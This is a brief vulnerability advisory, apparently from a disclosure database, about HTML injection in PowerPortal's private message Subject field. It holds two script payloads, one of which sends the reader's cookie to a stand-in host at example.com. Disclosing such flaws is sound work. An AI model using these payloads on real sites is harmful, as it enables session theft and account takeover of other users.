PowerPortal Private Message HTML Injection Vulnerability

PowerPortal Private Message HTML Injection Vulnerability

The following examples are available:

Subject: <script>alert(document.cookie);</script>
Subject: <script>document.location='http://www.example.com/?'+document.cookie</script>